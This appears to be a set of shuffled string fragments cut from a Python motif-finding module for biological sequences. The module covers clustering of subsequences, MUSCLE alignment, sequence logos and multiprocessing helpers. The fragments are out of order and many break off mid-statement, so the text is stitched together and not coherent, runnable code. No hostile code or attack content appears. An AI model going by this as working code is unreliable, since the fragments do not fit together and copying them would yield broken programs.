"muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality:",
"% (fname, cluster_id) with open(imagename, 'wb') as f: f.write(logo) return imagename def _wrap_image(self,",
"import os from collections import defaultdict from eden import apply_async import numpy as",
"motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th,",
"for i in motives], reverse=True): info = ' - %.2s %s' % \\",
"def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1",
"%.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable,",
"stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]:",
"= np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig =",
"np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id",
"= max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for",
"\"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id for cluster_id in",
"gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for",
"cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: # find closest instance",
"= y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if fineprint:",
"n_j) logger.debug(info1 + info2) # update motives motives[i] = motif del motives[j] success",
"subarrays_items = [] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item =",
"sigs = sig[:median_len] else: if len(sig) >= median_len: sigs = sigs + sig[:median_len]",
"end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin,",
"[] for h, s in haystack: for match in re.finditer(needle, s): s =",
"regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image( figname, output_type=output_type)) txt.append('_' * 100) else:",
"neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup",
"= {'maxiters': 7} if self.diags is True: params['diags'] = True if self.maxhours is",
"h, align_seq in align_seqs: str_list = [c for c in align_seq] concat_str =",
"estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time size",
"pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size = min_subarray_size",
"(p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y =",
"return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma =",
"#%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 + info2) # update",
"neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e:",
"'%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None",
"7} if self.diags is True: params['diags'] = True if self.maxhours is not None:",
"overlapped=True) if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts",
"% motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info)",
"in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and compute their",
"if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0)",
"return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in",
"\"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self, data): params = {'maxiters':",
"if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs,",
"compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear')",
"regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f'",
"motives[cluster_id]['counts'] fr = motives[cluster_id]['freq'] info = ' - num occurrences of regex: %d'",
"std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is",
"format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif self.output_format",
"IUPAC from Bio.Seq import Seq from Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet,",
"iterable: new_header = header new_header += '<loc>' + str(begin) + ':' new_header +=",
"counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts, float(counts) / size def",
"plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig(",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0] == '-':",
"(cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives],",
"def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle, haystack)) size = len(haystack) return counts,",
"= np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() -",
"code = [] for letter, count in k: if count / float(size) >",
"ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt",
"first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars",
"%.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = '",
"sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical",
"* neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time",
"score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield",
"multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm =",
"min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs,",
"'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\" self.diags = diags self.maxiters = maxiters self.maxhours",
"in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt) return",
"in haystack: for match in re.finditer(needle, s): s = match.start() e = match.end()",
"= sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def ecdf(x):",
"_fasta_to_fasta(lines): seq = \"\" for line in lines: if line: if line[0] ==",
"self.b = popt else: logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d",
"patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences')",
"# kmers dont interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id])",
"= motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq'] = freq motives[cluster_id]['counts'] = counts",
"options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name",
"clusters: if len(clusters[cluster_id]) > 0: seqs = [s for h, s in clusters[cluster_id]]",
"eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from sklearn.base import BaseEstimator,",
"else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs",
"time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y",
"dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs)",
"TODO: check if this alphabet is required # it over-rides tool.alphabet alphabet='dna', #",
"2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist(",
"\"\"\"compute_cooccurence.\"\"\" if ids is None: ids = [id for id in motives] seqs_summary",
"[] for letter, count in k: if count / float(size) > regex_th: if",
"figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else:",
"ys = np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k,",
"collections import defaultdict from eden import apply_async import numpy as np from scipy.sparse",
"plt.ylabel('Importance score') if fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight',",
"nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False",
"for id1, id2 in c[:, 0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2",
"subarrays_item = p.get() subarrays_items += subarrays_item d_time = time.time() - start_time d_loc_time =",
"s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins, patches =",
"out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i in range(len(out[:-1]))[::2]: id",
"as re from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import",
"%s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname",
"vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname",
"cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1) /",
"kmers dont interfere cluster_seqs = [] for cluster_id in clusters: if len(clusters[cluster_id]) >",
"' deleting: %d [%d is now #%d]' % \\ (j, i, n_i +",
"motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring filter.') return",
"and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif =",
"c_j): selected = c_i - c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx =",
"if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq =",
"smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start, end, width = max(box_decomposition(sig,",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process,",
"True dtime = time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters",
"ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) >",
"mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable, pos_block_size)]",
"score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 = ' deleting:",
"output_type='screen'): pwd = os.getcwd() url = pwd + '/' + fname txt =",
"for input sequences.\"\"\" # seperate headers headers, instances = [list(x) for x in",
"seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time",
"begin, end = loc.split(':') begin = int(begin) end = int(end) subseq = header.split('<subseq>')[1]",
"\"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds, nbins,",
"return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time =",
"y return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable",
"x in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j,",
"freq motives[cluster_id]['counts'] = counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos']",
"+ half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids",
"for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1):",
"2 * nw_score / (len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score,",
"= c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val =",
"instance j from any instance in i d_ij = [] for c_i in",
"exc_info=True) def _decompose_header(self, header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1]",
"% len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3,",
"return aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\"",
"'classic' wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt",
"if len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts =",
"true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred)",
"self.a, self.b = -4, 1 scores = [score for header, score, begin, end,",
"cooccurence_mtx[i, j] += 1 if i != j: # find closest instance j",
"\\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id,",
"n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed",
"= [] for i, row in enumerate(cooccurence_mtx): norm = row[i] if norm !=",
"args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time()",
"motives[cluster_id]['std_pos'] = std if freq_th is None or freq >= freq_th: if std_th",
"fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j !=",
"+= 1 if i != j: # find closest instance j from any",
"orig_header, score, begin, end, subseq = components p = self.compute_p_value(score) if p <=",
"# join all sequences in a cluster with enough space that # kmers",
"= np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc =",
"len(motives)) return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict()",
"row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq += k[0][0] return",
"line[0] == '>': if seq: yield seq seq = \"\" line_str = str(line)",
"motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format",
"min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters(",
"== '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if float(val) /",
"motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return",
"pool, serial_score, args=(seqs, vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs'",
"self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs,",
"motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter(",
"size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in",
"the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a =",
"Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this",
"is None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0:",
"- start_time)) logger.debug('Vectorizing') start_time = time.time() matrices = [] for i, p in",
"i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4,",
"sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info =",
"instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet =",
"import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC from Bio.Seq import",
"zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters except Exception",
"= [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in",
"logo_txt) return logos else: logger.warning( 'No logo to compute. Try more permissive parameters.')",
"min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives",
"\\ (j, i, n_i + n_j) logger.debug(info1 + info2) # update motives motives[i]",
"logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def _decompose_header(self, header): score =",
"' - num co-occurences %d %s vs %d %s: %d' % \\ (cluster_id,",
"ids: for h, s in motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin,",
"(orig_header, orig_seq), (seq, score) in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size,",
"len(subsequences)) n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences,",
"import SGDClassifier from sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import",
"np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in",
"min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif dtime = time.time() -",
"% len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' % motif['consensus_seq'] logo_txt.append(info)",
"score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt,",
"[] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end =",
"'\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40, size=(17, 2), output_type='screen', fname=None):",
"size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if count",
"for id in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in",
"(i, size, d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None,",
"(len(seq_i) + len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self,",
"y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution",
"yield line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq:",
"motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq = occurrences(c_regex, seqs) yield freq, id,",
"len(align_seqs) > min_cluster_size: return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6,",
"return p_val def compute_clusters(self, seqs=None, p_value=0.05): \"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable =",
"= 0 to_be_removed = [] for i, row in enumerate(cluster.T): c = Counter(row)",
"%.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() preds = np.hstack(preds) binary_preds =",
"[a for i, a in enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq)))",
"in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for",
"if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val = k[0][1] if",
"if line: if line[0] == '>': if seq: yield seq seq = \"\"",
"freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq']",
"resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = '",
"+ url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname +",
"subarray in subarrays: subseq_seq = subarray['subarray_string'] begin = subarray['begin'] end = subarray['end'] score",
"iterable = iter(iterable) while True: items = [] for i in range(n): it",
"- c_j distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = []",
"regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname,",
"is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1",
"- np.percentile(locs, 30) else: avg_loc = -1 std_loc = 0 return avg_loc, std_loc",
"def _fasta_to_fasta(lines): seq = \"\" for line in lines: if line: if line[0]",
"= Alphabet('AGCT') motif_corebio = SeqList(alist=instances, alphabet=alphabet) data = wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options)",
"subarrays: %d' % len(motif['seqs']) logo_txt.append(info) info = ' - consensus sequence: %s' %",
"fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width:",
"src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives, nbins=40,",
"position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j)",
"= vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in zip(iterable,",
"match in re.finditer(needle, s): s = match.start() e = match.end() m = s",
"else: val = k[0][1] if float(val) / dim >= min_freq: score += 1",
"p_value=p_value) for header, begin, end, p, subseq in iterable: new_header = header new_header",
"match.start() e = match.end() m = s + (e - s) / 2",
"color='g') sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r')",
"distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins,",
"max(box_decomposition(sig, half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for h,",
"def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\"",
"= '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname",
"regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i",
"(#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2 = '",
"width:%s' % (val, start, end, width)) for h, s in seqs: if s[start:end]:",
"reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts =",
"__init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state self.a = -4 self.b = 1 def",
"cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp,",
"figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname =",
"return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val, start,",
"fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives],",
"info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo(",
"facecolor='blue', alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png'",
"sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)],",
"motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex = consensus_regex(motives[id]['trimmed_align_seqs'], regex_th) counts, freq",
"= time.time() if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs)",
"orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq,",
"\"\"\"SequenceMotifDecomposer is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging",
"+ n_j) logger.debug(info1 + info2) # update motives motives[i] = motif del motives[j]",
"* (complexity * 2) # join all sequences in a cluster with enough",
"\"\" line_str = str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq",
"''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma =",
"= time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]),",
"align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs, motives,",
"_identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in motives: if j",
"logo_txt.append(info) info = ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image,",
"= ' - consensus regex: %s' % motif['regex_seq'] logo_txt.append(info) return logo_image, logo_txt def",
"if len(clusters[cluster_id]) > 0: seqs = [s for h, s in clusters[cluster_id]] seq",
"min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives =",
"'<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' %",
"fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type =",
"secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return",
"p = self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p, subseq",
"enough space that # kmers dont interfere cluster_seqs = [] for cluster_id in",
"if n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results =",
"numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools",
"= np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else: pool =",
"scores def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs",
"def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs):",
"smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs = None",
"self.alphabet = IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet =",
"size = max(id for id in motives) + 1 cooccurence_mtx = np.zeros((size, size))",
"locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else:",
"= extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None",
"StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet",
"time.time() pos_data_matrix = p.get() matrices += pos_data_matrix d_time = time.time() - start_time d_loc_time",
